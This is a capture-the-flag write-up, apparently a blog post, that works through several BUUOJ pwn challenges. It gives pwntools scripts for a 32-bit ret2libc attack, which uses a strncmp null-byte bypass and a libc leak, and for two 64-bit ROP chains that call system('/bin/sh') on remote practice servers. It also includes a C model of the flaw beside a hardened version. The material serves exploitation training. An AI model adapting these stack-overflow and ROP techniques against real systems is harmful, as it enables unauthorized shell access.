[OGeek2019]babyrop
32-bit ELF file. Load it into 32-bit IDA and look at the logic first; the
main function and the vulnerability point:
/dev/urandom is used here to generate random numbers,
and then the following function, sub_804871F,
has no vulnerability. Next look at the following function, sub_80487D0:
a1 only needs to be large enough to complete the stack overflow.
a1 is also related to v2, and v2 = a2[7], where a2 is the data we input,
so the vulnerability point is found.
But there is one thing to pay attention to.
This place compares two buffers, so we make v1 equal to 0, that is, send \x00 as the first byte: strlen then returns 0, so the comparison length is 0 and the first 0 bytes are trivially equal, which bypasses the check.
Checksec again.
The system function and the /bin/sh string were not found,
and a libc-2.23.so file was given,
so this question should be a classic 32-bit ret2libc question.
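As an added illustration (not the challenge binary's own code) of the two weak spots described above, here is a C model of the comparison and of the length-controlled read, each beside a hardened version; the secret length, the message size and the frame layout are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Sizes assumed from the payloads: a 0x19-byte first message and a
 * 0xe7-byte stack buffer; the secret length is an assumption. */
#define SECRET_LEN 8
#define MSG_SIZE   0x19
#define BUF_SIZE   0xe7

/* Weak check: the strncmp length is strlen() of the untrusted message,
 * so a message whose first byte is '\0' compares zero bytes and passes. */
int weak_check(const char *msg, const char *secret)
{
    return strncmp(msg, secret, strlen(msg)) == 0;
}

/* Hardened: always compare a fixed number of secret bytes, never a
 * length derived from the input. */
int safe_check(const char *msg, const char *secret)
{
    return memcmp(msg, secret, SECRET_LEN) == 0;
}

/* Weak length: the next read's size is byte 7 of the first message
 * (v2 = a2[7] in the writeup) and can be 0xff, more than BUF_SIZE. */
size_t weak_read_len(const unsigned char *msg) { return msg[7]; }

/* Hardened: clamp the count to the destination buffer. */
size_t safe_read_len(const unsigned char *msg)
{
    size_t n = msg[7];
    return n > BUF_SIZE ? BUF_SIZE : n;
}

/* Frame model for the second read: the buffer followed by the saved
 * return address. Copies n bytes and returns 1 if saved_ret was
 * overwritten, 0 if it stayed intact. */
struct frame { unsigned char buf[BUF_SIZE]; uint32_t saved_ret; };

int second_read_clobbers_ret(const unsigned char *data, size_t n)
{
    struct frame f;
    f.saved_ret = 0x41414141u;          /* sentinel, model only */
    if (n > sizeof f) n = sizeof f;     /* keep the model well-defined */
    memcpy(&f, data, n);
    return f.saved_ret != 0x41414141u;
}
```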
The script is as follows:
from pwn import *
context(os = "linux", arch = "i386")
context.log_level = 'debug'
p=remote("node4.buuoj.cn",29035)
elf=ELF("./pwn13")
libc=ELF("./libc-2.23.so")
ret=0x08048502
main=0x08048825
write_plt=elf.plt['write']
read_got=elf.got['read']
# leading \x00 makes strlen() return 0 so the comparison passes;
# \x denotes hexadecimal, so \xff is the byte 0xff (byte 7 becomes the read length)
pay=b'\x00'+b'\xff'*0x18
p.sendline(pay)
p.recvuntil(b"Correct\n")
# stage 1: write(1, read_got, 4) leaks the address of read, then return to main
payload=b'a'*(0xe7+4)+p32(write_plt)+p32(main)+p32(1)+p32(read_got)+p32(4)
p.sendline(payload)
read_addr=u32(p.recv(4))   # 32-bit target: the leaked pointer is 4 bytes
print(hex(read_addr))
libc_base=read_addr-libc.sym['read']
system_addr=libc_base+libc.sym['system']
binsh=libc_base+next(libc.search(b"/bin/sh"))
# stage 2: same bypass, then system("/bin/sh")
pay=b'\x00'+b'\xff'*0x18
p.sendline(pay)
p.recvuntil(b"Correct\n")
payload=b'a'*(0xe7+4)+p32(system_addr)+p32(ret)+p32(binsh)
p.sendline(payload)
p.interactive()
jarvisoj_level2_x64
64-bit ELF file. Load it into 64-bit IDA to see the main logic.
There is a system function and an overflow point. Shift+F12 to see whether there is a /bin/sh string. Since there is,
you need a pop rdi; ret gadget,
and then checksec.
Then call system directly:
construct the ROP chain.
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node4.buuoj.cn",26205)
#p=process("./pwn14")
system_addr=0x4004C0
binsh=0x600A90
ret=0x00000000004004a1   # ret gadget, keeps the stack 16-byte aligned before system
pop=0x00000000004006b3   # pop rdi; ret
payload=b'a'*(0x80+8)+p64(pop)+p64(binsh)+p64(ret)+p64(system_addr)
p.sendline(payload)
p.interactive()
[HarekazeCTF2019]baby_rop
64-bit ELF file. Load it into 64-bit IDA
and find an overflow point; there is a system function, so check whether there is /bin/sh,
and then checksec.
Then this question is almost the same as the one above.
Construct the ROP chain:
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("node4.buuoj.cn",27033)
#p=process("./pwn14")
system_addr=0x400490
binsh=0x601048
ret=0x0000000000400479   # ret gadget, keeps the stack 16-byte aligned before system
pop=0x0000000000400683   # pop rdi; ret
payload=b'a'*(0x10+8)+p64(pop)+p64(binsh)+p64(ret)+p64(system_addr)
p.sendline(payload)
p.interactive()
ciscn_2019_en_2
This question has been posted before; it is exactly the same classic
64-bit ret2libc question.
The following is what I wrote before:
https://blog.csdn.net/cainiao78777/article/details/127988372?spm=1001.2014.3001.5501